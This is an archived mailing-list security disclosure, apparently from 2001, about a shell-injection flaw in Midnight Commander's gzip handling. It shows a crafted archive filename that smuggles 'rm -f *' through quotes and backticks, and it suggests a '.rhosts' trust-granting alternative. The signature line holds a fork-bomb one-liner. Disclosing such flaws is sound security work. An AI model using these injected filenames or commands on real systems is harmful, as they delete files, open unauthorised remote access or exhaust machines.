I discovered a problem with Midnight Commander's method of decompressing archives, which allows execution of hidden commands. Evil file may be prepared this way: $ gzip foo $ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz" Now, this filename, when displayed by user-friendly programs (www or ftp browsers, file managers), will be cropped to fit in a window :) Under my mc (vidmode 11) it's displayed as: quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :) When I'm viewing or editing .gz archive (F3/F4/ENTER) - Midnight Commander calls gzip from a shell script created in /tmp: gzip -dc 'filename' 2>/dev/null That may be dangerous. In above case, this script is equal to: gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null rm -f * 'rm -f *' may be replaced with 'echo + +>.rhosts', 'touch WHOS_THE_WINNER' etc ;) Of course, it isn't serious problem for experienced users, but what's with the non-experienced ones (80%) ;-) _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:48 PDT